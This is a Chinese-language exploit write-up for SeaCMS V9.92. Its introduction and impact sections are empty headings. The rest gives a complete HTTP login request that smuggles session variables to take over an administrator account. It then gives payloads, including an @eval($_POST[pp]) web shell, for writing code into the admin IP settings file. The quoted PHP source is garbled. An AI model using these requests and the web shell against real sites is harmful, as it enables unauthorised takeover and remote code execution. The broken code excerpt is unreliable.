# Seacms V9.92 越权+Getshell
==========================
一、漏洞简介
————
二、漏洞影响
————
三、复现过程
————
### 越权
#### 1、首先注册一个普通用户
#### 2、burp抓包改包,下面是发送payload
POST /login.php HTTP/1.1
Host: 0-sec.org
Content-Length: 49
Cache-Control: max-age=0
Origin: http://192.168.8.143
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://192.168.8.143/login.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=9smu8an6nvbrqasp5m0o4bmts7
Connection: close
dopost=login&userid=test&pwd=123456&validate=djyf&_SESSION[sea_admin_id]=1&_SESSION[sea_ckstr]=djyf
#### 3、 登陆后台页面,可以发现管理员账户变成-1了,也同时拥有管理员的权限
### getshell
/admin/ip.php
if($action==”set”)
{
$v= $_POST[‘v’];
$ip = $_POST[‘ip’];
$open=fopen(“../data/admin/ip.php”,”w” );
$str=’“;
fwrite($open,$str);
fclose($open);
ShowMsg(“成功保存设置!”,”admin_ip.php”);
exit;
我们再去看一下ip.php格式
我们可以构造一下,然后保存
*;phpinfo();//
“;@eval($_POST[pp]);//
image
请登录后查看评论内容